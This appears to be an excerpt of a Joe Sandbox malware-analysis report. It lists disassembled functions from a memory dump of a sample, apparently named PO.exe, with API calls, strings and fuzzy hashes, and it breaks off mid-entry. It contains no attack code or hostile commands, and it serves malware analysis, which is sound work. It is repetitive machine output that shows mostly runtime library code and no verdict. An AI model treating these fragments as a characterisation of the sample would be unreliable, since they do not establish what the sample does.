Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: LTR$RTL
API String ID: 3537982541-719208805
Opcode ID: 601591e050132657465adcd0194e66343a0c3fe74ce681237062a16a2356bed9
Instruction ID: 930890d429540414344695a33dbc4928376344b3f25fa034d68fd629395241ce
Opcode Fuzzy Hash: 601591e050132657465adcd0194e66343a0c3fe74ce681237062a16a2356bed9
Instruction Fuzzy Hash: 1AF059B160479427EB3466B56C0EFAB3BACE781B00F18036EB649970C0CFE1990D87E0

Function 00C8B355 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00C8B3E0
__alldvrm.LIBCMT ref: 00C8B5E1
__alldvrm.LIBCMT ref: 00C8B603

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 82a8409b50e41e7ff812f2450216d1d41601efd86ff278fd51673b24b6a99672
Instruction ID: 706291a6d42a1143ef535e84398c76608520d910e98671b1e91f0efa6e4d0ce9
Opcode Fuzzy Hash: 82a8409b50e41e7ff812f2450216d1d41601efd86ff278fd51673b24b6a99672
Instruction Fuzzy Hash: DCA1AB729003869FDB25EF18C8927BEBFE0EF55318F18416DE4A59B282D7349E42C758

Function 00C7AF1C Relevance: 6.3, APIs: 4, Instructions: 287COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00C7AFD8
_strncpy.LIBCMT ref: 00C7B095
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C7B0DE
_strncpy.LIBCMT ref: 00C7B199

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: _strncpy$Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 2527496121-0
Opcode ID: 994048f68708b5d620a132504b66fe5f0281a51429ce80cd3a1890d6ebe66079
Instruction ID: 2be9075ba9026b85ba5725d963461d28fb4a95cbe3e75628206a1aa882ae5220
Opcode Fuzzy Hash: 994048f68708b5d620a132504b66fe5f0281a51429ce80cd3a1890d6ebe66079
Instruction Fuzzy Hash: B6A178B1509301DBC724DF69EC85B2E7BEAFBC8314F148B2AF91993261D7709D049B92

Function 00C7B9D8 Relevance: 6.2, APIs: 4, Instructions: 191COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00C7B9F3
_memcmp.LIBVCRUNTIME ref: 00C7BA97
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C7BB1B
_memcmp.LIBVCRUNTIME ref: 00C7BBB6

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: _memcmp$Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 3520290970-0
Opcode ID: 18033d9df1f2ce1e2e17572a538c4dcdb2137b597f52555b49588b534ae7ca56
Instruction ID: 541f962c37b37b1de2c823395da900cd496bb63713526a5e3df0cbae709a1675
Opcode Fuzzy Hash: 18033d9df1f2ce1e2e17572a538c4dcdb2137b597f52555b49588b534ae7ca56
Instruction Fuzzy Hash: CA6177B1608205DFD728DF29EC85B2A7BA5FBC4724F148329FD19D72A1E730AD408B52

Function 00C72524 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00C725CA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800), ref: 00C7260E
SetFileTime.KERNEL32(?,?,?,00000000), ref: 00C7268F
CloseHandle.KERNEL32(?), ref: 00C72696

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 18729a9587202e3be4203240e2eccc3ad20212984de88a2757f6ac45c0f856d2
Instruction ID: db187ad7eabd4eb629195200765292dc1dc7aaacbaded25e8f1063b9155eb34f
Opcode Fuzzy Hash: 18729a9587202e3be4203240e2eccc3ad20212984de88a2757f6ac45c0f856d2
Instruction Fuzzy Hash: 2341F030248381AAE721DF24CC55FEEBBE8AF84700F04891EF9E8D7191C674DB089B52

Function 00C8E1E1 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,91E85006,00C873FC,00000000,00000000,00C87C2A,?,00C87C2A,?,00000001,00C873FC,91E85006,00000001,00C87C2A,00C87C2A), ref: 00C8E22E
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C8E2B7
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00C8E2C9
__freea.LIBCMT ref: 00C8E2D2

Part of subcall function 00C8A838: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C87012,?,0000015D,?,?,?,?,00C87B91,000000FF,00000000,?,?), ref: 00C8A86A

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: cba1a6b675270e3e3bf36dc614d24f0323c1236c8bfb95f3281b4b8ba72ec4bb
Instruction ID: ca8ba6ac26301f66820f8fa39c2b69a6e84936b68fad8a9b47cbc32d99b3ddd5
Opcode Fuzzy Hash: cba1a6b675270e3e3bf36dc614d24f0323c1236c8bfb95f3281b4b8ba72ec4bb
Instruction Fuzzy Hash: 3D31F232A0020AABDF25EF65DC85EAE7BA9EF40315F140229FC14D7190E735DE51DBA4

Function 00C7E93A Relevance: 6.1, APIs: 4, Instructions: 55windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 00C7E94A
GetObjectW.GDI32(00000000,00000018,?), ref: 00C7E96B
DeleteObject.GDI32(00000000), ref: 00C7E993
DeleteObject.GDI32(00000000), ref: 00C7E9B2

Part of subcall function 00C7DB06: FindResourceW.KERNEL32(00000066,PNG,?,?,00C7E98C,00000066), ref: 00C7DB17
Part of subcall function 00C7DB06: SizeofResource.KERNEL32(00000000,75FD5780,?,?,00C7E98C,00000066), ref: 00C7DB2F
Part of subcall function 00C7DB06: LoadResource.KERNEL32(00000000,?,?,00C7E98C,00000066), ref: 00C7DB42
Part of subcall function 00C7DB06: LockResource.KERNEL32(00000000,?,?,00C7E98C,00000066), ref: 00C7DB4D

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
String ID:
API String ID: 142272564-0
Opcode ID: ef3d10181b4018f0950e003f5c14ca26a7e0dd4cefbe39a6ba9cbd69dae8e89a
Instruction ID: 006027c8e4efd13121d635973f362a623cf65cc38b895491707b0418a35f21b1
Opcode Fuzzy Hash: ef3d10181b4018f0950e003f5c14ca26a7e0dd4cefbe39a6ba9cbd69dae8e89a
Instruction Fuzzy Hash: 5A012B3364020577CA1133788C46FBF7B7DAF89B51F094165FA09E7191DE11CC15A1A1

Function 00C85D5A Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00C85D71

Part of subcall function 00C863A9: ___AdjustPointer.LIBCMT ref: 00C863F3

_UnwindNestedFrames.LIBCMT ref: 00C85D88
___FrameUnwindToState.LIBVCRUNTIME ref: 00C85D9A
CallCatchBlock.LIBVCRUNTIME ref: 00C85DBE

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 6fa91e04da766b24e34099e515c0a701b44e936f18e28dadd3d333c7dad21dd7
Instruction ID: 272538c39884b81f5979548339893141c1a83a3a09a41b391e17cd04f97ef5b9
Opcode Fuzzy Hash: 6fa91e04da766b24e34099e515c0a701b44e936f18e28dadd3d333c7dad21dd7
Instruction Fuzzy Hash: 43012532000908BFCF126F55CD09EDA3BBAEF98719F148115FE1866120C372E861EBA8

Function 00C85684 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00C85684
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00C85689
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00C8568E

Part of subcall function 00C867FE: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00C8680F

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00C856A3

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 216b7c590bb4bcc37f223e8d58ee93ca824c24aa177a21f58ee32619cf1884c0
Instruction ID: c552a6ea6a4ec971f15dc254d7f71c8f776554f810cb3f7b1ef0868673d99c98
Opcode Fuzzy Hash: 216b7c590bb4bcc37f223e8d58ee93ca824c24aa177a21f58ee32619cf1884c0
Instruction Fuzzy Hash: 2CC048A8000A42A09C143AB162025AD27810E667DCBD054E5F96127603BECA190BBB7F

Function 00C7BC85 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 283COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00C7BEA4
_memcmp.LIBVCRUNTIME ref: 00C7BF14

Strings

PO.exe, xrefs: 00C7BC96, 00C7BE35, 00C7BFAF

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: _memcmp
String ID: PO.exe
API String ID: 2931989736-3005272355
Opcode ID: daafdb3c1e818e7baafa040ecce523f7cc3ba39818c2c992af30121184ee8d05
Instruction ID: f79fa5adaa253ee2887cbc08e1778f6494f0d90706989b2341bd770b391d7587
Opcode Fuzzy Hash: daafdb3c1e818e7baafa040ecce523f7cc3ba39818c2c992af30121184ee8d05
Instruction Fuzzy Hash: E3A11671508281DBD321DB64DC81BAE77A9BB85304F08C72EF99DC3262DB708D49DB52

Function 00C7DC29 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 00C7DADB: GetDC.USER32(00000000), ref: 00C7DADF
Part of subcall function 00C7DADB: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C7DAEA
Part of subcall function 00C7DADB: ReleaseDC.USER32(00000000,00000000), ref: 00C7DAF5

GetObjectW.GDI32(?,00000018,?), ref: 00C7DC5A

Part of subcall function 00C7DE20: GetDC.USER32(00000000), ref: 00C7DE29
Part of subcall function 00C7DE20: GetObjectW.GDI32(?,00000018,?), ref: 00C7DE58
Part of subcall function 00C7DE20: ReleaseDC.USER32(00000000,?), ref: 00C7DEEC

Strings

(, xrefs: 00C7DD25

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 6562473f71bb9b5b01d01c9a1e3a8bcc335ceaa328a5ce6092db5b0a69b9b16b
Instruction ID: 8cda80e2d849c4dfc1bd602282884adf38146848f21e3e652199043d4b5d8f6b
Opcode Fuzzy Hash: 6562473f71bb9b5b01d01c9a1e3a8bcc335ceaa328a5ce6092db5b0a69b9b16b
Instruction Fuzzy Hash: 2F61F4B1208355AFD210DF64C888E6BBBE9FF89744F10891DF59ACB260D671E905CB62

Function 00C76682 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00C76848

Strings

%ls, xrefs: 00C766C1, 00C766D7
%s: %s, xrefs: 00C76857

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 565eae74809fe593c88f9e0b547239c62db4e9850a97b15dd515c3a4b9c00471
Instruction ID: 3fa0807b67d1f8ebd4c9ace1c796ad3044cd6cfff87434230d1f722397884e66
Opcode Fuzzy Hash: 565eae74809fe593c88f9e0b547239c62db4e9850a97b15dd515c3a4b9c00471
Instruction Fuzzy Hash: 57516C31188F01F6E6292A918D47F757764AB04F88F20C417F3AE740E2D9E29A547B1B

Function 00C8CA54 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00C8CBC0

Part of subcall function 00C8AB31: IsProcessorFeaturePresent.KERNEL32(00000017,00C8AB20,0000002C,00C9C988,00C8DB5C,00000000,00000000,00C8B1A5,?,?,00C8AB2D,00000000,00000000,00000000,00000000,00000000), ref: 00C8AB33
Part of subcall function 00C8AB31: GetCurrentProcess.KERNEL32(C0000417,00C9C988,0000002C,00C8A896,00000016,00C8B1A5), ref: 00C8AB55
Part of subcall function 00C8AB31: TerminateProcess.KERNEL32(00000000), ref: 00C8AB5C

Strings

., xrefs: 00C8CD77
*?, xrefs: 00C8CA97

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 3a3d99b21c2538509487d73607efedee4e20e3b6303f82c4bdbaae18271d93fd
Instruction ID: eaae16e5db3f5612e2b790a0a97ff4e5705bb6af0da057653fc18325fd5eed91
Opcode Fuzzy Hash: 3a3d99b21c2538509487d73607efedee4e20e3b6303f82c4bdbaae18271d93fd
Instruction Fuzzy Hash: F2519471E00109AFDF14EFA8C881ABDB7F5FF58318F24816AE954E7340E6359E019B64

Function 00C73283 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

\\?\, xrefs: 00C732D5, 00C73311, 00C73372, 00C733C5
UNC, xrefs: 00C7331F

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID:
String ID: UNC$\\?\
API String ID: 0-253988292
Opcode ID: 9b6c1600da655b3c72c42c7b4d32c18dba14fa12c5991b705c7b7d0b3c2b0ba5
Instruction ID: 9d1015136bc7d6ec12edde38a434d57bb5d0e252c97ac044d506b996edc234f4
Opcode Fuzzy Hash: 9b6c1600da655b3c72c42c7b4d32c18dba14fa12c5991b705c7b7d0b3c2b0ba5
Instruction Fuzzy Hash: 6841A131500699AACF22AF61CC06EFE7F69BF05350F10C465F86CA3152DB759B91BBA0

Function 00C7CF5B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00C7CF68

Strings

Shell.Explorer, xrefs: 00C7CF94
about:blank, xrefs: 00C7D000

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID:
String ID: Shell.Explorer$about:blank
API String ID: 0-874089819
Opcode ID: 3e559d64feacf9e38b3149015be5938ac721d0208bed0b13659502dc219b7d56
Instruction ID: e3a2906de117e937b7bc6597706b7b48ad13495291f49f81922dfb0d4dc7fb4e
Opcode Fuzzy Hash: 3e559d64feacf9e38b3149015be5938ac721d0208bed0b13659502dc219b7d56
Instruction Fuzzy Hash: 6B218B75200706AFD708ABB1C895E2AB37ABF44360F14C62DF11A8B281CB62ED41DB90

Function 00C80E06 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(00010476), ref: 00C80E42
DialogBoxParamW.USER32(GETPASSWORD1,00010476,Function_0000E50A,?), ref: 00C80E7E

Strings

GETPASSWORD1, xrefs: 00C80E73

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: DialogParamVisibleWindow
String ID: GETPASSWORD1
API String ID: 3157717868-3292211884
Opcode ID: 40f6630d23bb196ffbaa8c6c88e7cd2e8bf0036f78df1a65f37ef1e245aace6a
Instruction ID: c4c858dde93b35128ab02665ade7523204acb5e85693eac887d38ae3771780f6
Opcode Fuzzy Hash: 40f6630d23bb196ffbaa8c6c88e7cd2e8bf0036f78df1a65f37ef1e245aace6a
Instruction Fuzzy Hash: CC119B727002086ADF21EF34DC46BAF3388B705319F254079FD49AB181CAB04D84D7A8

Function 00C74CC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00C74C41: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00C74C60
Part of subcall function 00C74C41: GetProcAddress.KERNEL32(00CA6CA0,CryptUnprotectMemory), ref: 00C74C70

GetCurrentProcessId.KERNEL32(?,?,?,00C74CBA), ref: 00C74D41

Strings

CryptUnprotectMemory failed, xrefs: 00C74D39
CryptProtectMemory failed, xrefs: 00C74D01

Memory Dump Source

